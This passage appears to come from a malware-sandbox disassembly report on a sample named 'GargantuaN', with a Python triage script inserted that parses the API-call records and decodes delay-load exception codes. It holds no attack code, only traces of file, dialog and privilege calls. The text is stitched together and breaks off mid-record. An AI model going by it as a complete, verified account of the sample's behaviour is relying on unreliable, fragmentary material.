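  • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
  • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
Similarity
• Opcode ID: 36b68720f046198f02c27fd7c5ab63abaabf1b836828ba9a7f645e2b25e85064
• Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
  • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
Similarity
• Opcode ID: 2fe184eddbcd9a27163e6c57fd8713d097cacbb65785b58a69a2c70ffdb740b6
• Instruction ID: 06d3c47baf0398ba0653f85e2aa3f595d30cf7a8302f4c3be7bbfdddd39a3e8d
Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
  • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
Similarity
• Opcode ID: b2496eb0fb2252deb44312bb5af6bebf9f0e2cf9fd10945c5b4cd096f1aaf54f
• Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
Uniqueness Score: -1.00%
"""

# Layout assumptions about the listing (not a documented Joe Sandbox schema):
# a record starts at a line reading "APIs"; the first bullet is the function's
# own top-level call; indented sub-bullets describe callee behaviour.
RECORD_START = re.compile(r"^APIs[ \t]*$", re.MULTILINE)
TOP_CALL = re.compile(r"^[ \t]*•[ \t]*(\S+)[ \t]+ref:[ \t]*([0-9A-Fa-f]{8})", re.MULTILINE)
RAISE_CODE = re.compile(r"RaiseException\.KERNEL32\(([0-9A-Fa-f]{8}),")
OPCODE_ID = re.compile(r"Opcode ID:[ \t]*([0-9a-f]{64})")
INSTR_ID = re.compile(r"Instruction ID:[ \t]*([0-9a-f]{64})")

# VcppException(sev, err) = sev | (FACILITY_VISUALCPP << 16) | err
FACILITY_VISUALCPP = 0x6D
WIN32_ERROR_NAMES = {
    0x57: "ERROR_INVALID_PARAMETER",  # delay-load descriptor not understood
    0x7E: "ERROR_MOD_NOT_FOUND",      # target DLL could not be loaded
    0x7F: "ERROR_PROC_NOT_FOUND",     # export missing from the loaded DLL
}


def parse_records(text: str) -> list[dict]:
    """Split a listing into per-function records and pull out the triage fields."""
    records = []
    for chunk in RECORD_START.split(text):
        if "Opcode ID" not in chunk:
            continue  # text before the first record, or a truncated record
        call = TOP_CALL.search(chunk)
        raised = RAISE_CODE.search(chunk)
        records.append({
            "api": call.group(1) if call else None,
            "call_site": call.group(2) if call else None,
            "exception_code": int(raised.group(1), 16) if raised else None,
            "opcode_id": OPCODE_ID.search(chunk).group(1),
            "instruction_id": INSTR_ID.search(chunk).group(1),
        })
    return records


def decode_vcpp_exception(code: int) -> dict:
    """Break an NTSTATUS-style code into severity, facility and the embedded Win32 error."""
    win32 = code & 0xFFFF
    facility = (code >> 16) & 0x1FFF
    return {
        "is_error": (code >> 30) == 0b11,  # ERROR_SEVERITY_ERROR
        "facility": facility,
        "is_vcpp": facility == FACILITY_VISUALCPP,
        "win32_error": WIN32_ERROR_NAMES.get(win32, f"unknown(0x{win32:X})"),
    }


def group_by_instruction(records: list[dict]) -> dict[str, list[str]]:
    """Map each Instruction ID to the Opcode IDs sharing it: one body, several thunks."""
    groups: dict[str, list[str]] = defaultdict(list)
    for rec in records:
        groups[rec["instruction_id"]].append(rec["opcode_id"])
    return dict(groups)


def is_delay_load_stub(rec: dict) -> bool:
    """True when the record is a CRT delay-load thunk rather than sample-authored code."""
    if rec["api"] != "___delayLoadHelper2@8.DELAYIMP" or rec["exception_code"] is None:
        return False
    decoded = decode_vcpp_exception(rec["exception_code"])
    return decoded["is_error"] and decoded["is_vcpp"]


def triage(text: str) -> dict:
    """Summarise how much of a listing is compiler boilerplate worth skipping."""
    records = parse_records(text)
    return {
        "records": len(records),
        "distinct_bodies": len(group_by_instruction(records)),
        "delay_load_stubs": sum(is_delay_load_stub(r) for r in records),
    }


if __name__ == "__main__":
    for rec in parse_records(SAMPLE_RECORDS):
        print(rec["call_site"], rec["api"], decode_vcpp_exception(rec["exception_code"]))
    print(triage(SAMPLE_RECORDS))
```

Run against the full listing, the same grouping shows which Opcode IDs are only re-labelled copies of an identical instruction body; a record whose top call is not the delay-load helper, or whose RaiseException code decodes to a non-0x6D facility, is the one that deserves a closer look.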

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 11a7c29cca6697c13cb9873cfa5d13b0b2782b0d66dce165df10158d95d789b0
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: 11a7c29cca6697c13cb9873cfa5d13b0b2782b0d66dce165df10158d95d789b0
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 8b21305d0c62cfa0459bacd2ceaa58febefb890a4d979b703ae8d136e8166838
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: 8b21305d0c62cfa0459bacd2ceaa58febefb890a4d979b703ae8d136e8166838
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 95dd0558ed3a995be87f110eb4115562451c7cdf9158b16db0fd10891576e30d
                                                        • Instruction ID: ae3db18a6361cb2485784fa5d2bd661440d6e0bb705d10b86e80cdb8cea94dd0
                                                        • Opcode Fuzzy Hash: 95dd0558ed3a995be87f110eb4115562451c7cdf9158b16db0fd10891576e30d
                                                        • Instruction Fuzzy Hash: 77A011EA2A8020BE300822A22C03C3B030CC0C0B22330A22EF80282080F880080808B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E51F
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 384016d7d3606a94405f48b5897cc277a520b7f8e774d97a1e2a6a27d70f9b8b
                                                        • Instruction ID: 3404c67906004f8ab61e7f90c3964a15160b1f72c66a1c94867dda70a3dd903e
                                                        • Opcode Fuzzy Hash: 384016d7d3606a94405f48b5897cc277a520b7f8e774d97a1e2a6a27d70f9b8b
                                                        • Instruction Fuzzy Hash: 8DA011EA2A8002BE30082200AC03C3B030CC0C2F20330A82EF802C00C0F8800C0808B0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetEndOfFile.KERNELBASE(?,00D5903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00D59F0C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File
                                                        • String ID:
                                                        • API String ID: 749574446-0
                                                        • Opcode ID: f14e387f2a8cf900f3438bff26e76ed79d7562fd71352a9f6e19a834965d207f
                                                        • Instruction ID: e4a417e534e2cc7a9734044c7ca63f5c49e8ad9ffc50e9a7b805d99d391f3322
                                                        • Opcode Fuzzy Hash: f14e387f2a8cf900f3438bff26e76ed79d7562fd71352a9f6e19a834965d207f
                                                        • Instruction Fuzzy Hash: A8A011300A020A8A8E002B30CA0800C3B20EB20BC032002A8A00ACA0A2CB22880B8B20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetCurrentDirectoryW.KERNELBASE(?,00D6AE72,C:\Users\user\AppData\Local\Temp,00000000,00D9946A,00000006), ref: 00D6AC08
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID:
                                                        • API String ID: 1611563598-0
                                                        • Opcode ID: e0154d84aef644fc8507bd0f16078253df08700a8c7c82b6e57a408c22318c15
                                                        • Instruction ID: f34233fb5fdd3453f061d68fc69d6d6fee2d7968efe9f9e3f4faa8c502a7f258
                                                        • Opcode Fuzzy Hash: e0154d84aef644fc8507bd0f16078253df08700a8c7c82b6e57a408c22318c15
                                                        • Instruction Fuzzy Hash: 33A011302003008B82000B328F0AA0FBAAAAFA2F00F00C028A008C0230CB38C820AA20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D6C2B1
                                                        • EndDialog.USER32(?,00000006), ref: 00D6C2C4
                                                        • GetDlgItem.USER32(?,0000006C), ref: 00D6C2E0
                                                        • SetFocus.USER32(00000000), ref: 00D6C2E7
                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D6C321
                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D6C358
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00D6C36E
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D6C38C
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6C39C
                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6C3B8
                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6C3D4
                                                        • _swprintf.LIBCMT ref: 00D6C404
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D6C417
                                                        • FindClose.KERNEL32(00000000), ref: 00D6C41E
                                                        • _swprintf.LIBCMT ref: 00D6C477
                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D6C48A
                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D6C4A7
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D6C4C7
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6C4D7
                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6C4F1
                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6C509
                                                        • _swprintf.LIBCMT ref: 00D6C535
                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D6C548
                                                        • _swprintf.LIBCMT ref: 00D6C59C
                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D6C5AF
                                                          • Part of subcall function 00D6AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D6AF35
                                                          • Part of subcall function 00D6AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D8E72C,?,?), ref: 00D6AF84
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                        • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                        • API String ID: 797121971-1840816070
                                                        • Opcode ID: 6481c4a584cb4c0d78f68fe896ed050f8e6cbb94e8435d8f7ae55b0f027b2ac0
                                                        • Instruction ID: cd85c9d80e1d3feac193a5b595fa79a0865ff2ade09faf2d875b4be585c05c3a
                                                        • Opcode Fuzzy Hash: 6481c4a584cb4c0d78f68fe896ed050f8e6cbb94e8435d8f7ae55b0f027b2ac0
                                                        • Instruction Fuzzy Hash: 8E91B672158348BFD221DBA4DC49FFB77ACEB4AB40F044819FA89D6181D771E6088B72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D56FAA
                                                        • _wcslen.LIBCMT ref: 00D57013
                                                        • _wcslen.LIBCMT ref: 00D57084
                                                          • Part of subcall function 00D57A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57AAB
                                                          • Part of subcall function 00D57A9C: GetLastError.KERNEL32 ref: 00D57AF1
                                                          • Part of subcall function 00D57A9C: CloseHandle.KERNEL32(?), ref: 00D57B00
                                                          • Part of subcall function 00D5A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641,000000FF), ref: 00D5A1F1
                                                          • Part of subcall function 00D5A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641), ref: 00D5A21F
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00D57139
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D57155
                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D57298
                                                          • Part of subcall function 00D59DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D573BC,?,?,?,00000000), ref: 00D59DBC
                                                          • Part of subcall function 00D59DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00D59E70
                                                          • Part of subcall function 00D59620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D595D6,?,?,?,?,?,00D82641,000000FF), ref: 00D5963B
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A501
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A532
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                        • API String ID: 2821348736-3508440684
                                                        • Opcode ID: a5232a352dd8835401875334ab4abbb21e26fe9e4f4740aa5321211be5c31a0a
                                                        • Instruction ID: 57a05fc73a7793d7e244ff770976d450d3a1988a00ab27b735ee6c9d08661bfe
                                                        • Opcode Fuzzy Hash: a5232a352dd8835401875334ab4abbb21e26fe9e4f4740aa5321211be5c31a0a
                                                        • Instruction Fuzzy Hash: 3BC1A275904605AAEF21DB74DC42FEEB7B8EF04301F14455AFD5AE7282E730AA488B71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6F844
                                                        • IsDebuggerPresent.KERNEL32 ref: 00D6F910
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D6F930
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00D6F93A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                        • String ID:
                                                        • API String ID: 254469556-0
                                                        • Opcode ID: 3b20b2aa28e8ced556fcc33fd8fb09b540c12e464be3ff29f3746f28561c14ff
                                                        • Instruction ID: 9afb0d6b3cf3de58e3d4c02b37532d67a053a4648d7437111743792ac14e3b0a
                                                        • Opcode Fuzzy Hash: 3b20b2aa28e8ced556fcc33fd8fb09b540c12e464be3ff29f3746f28561c14ff
                                                        • Instruction Fuzzy Hash: 1F312975D05319ABDB20DFA4D9897CCBBB8AF08704F1040EAE40CAB250EB719B858F64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D5E30E
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                          • Part of subcall function 00D61DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D91030,00000200,00D5D928,00000000,?,00000050,00D91030), ref: 00D61DC4
                                                        • _strlen.LIBCMT ref: 00D5E32F
                                                        • SetDlgItemTextW.USER32(?,00D8E274,?), ref: 00D5E38F
                                                        • GetWindowRect.USER32(?,?), ref: 00D5E3C9
                                                        • GetClientRect.USER32(?,?), ref: 00D5E3D5
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00D5E475
                                                        • GetWindowRect.USER32(?,?), ref: 00D5E4A2
                                                        • SetWindowTextW.USER32(?,?), ref: 00D5E4DB
                                                        • GetSystemMetrics.USER32(00000008), ref: 00D5E4E3
                                                        • GetWindow.USER32(?,00000005), ref: 00D5E4EE
                                                        • GetWindowRect.USER32(00000000,?), ref: 00D5E51B
                                                        • GetWindow.USER32(00000000,00000002), ref: 00D5E58D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                        • String ID: $%s:$CAPTION$d
                                                        • API String ID: 2407758923-2512411981
                                                         Uniqueness
                                                         • Uniqueness Score: -1.00%
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 00D7CB66
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C71E
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C730
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C742
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C754
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C766
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C778
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C78A
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C79C
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7AE
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7C0
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7D2
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7E4
                                                          • Part of subcall function 00D7C701: _free.LIBCMT ref: 00D7C7F6
                                                        • _free.LIBCMT ref: 00D7CB5B
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D7CB7D
                                                        • _free.LIBCMT ref: 00D7CB92
                                                        • _free.LIBCMT ref: 00D7CB9D
                                                        • _free.LIBCMT ref: 00D7CBBF
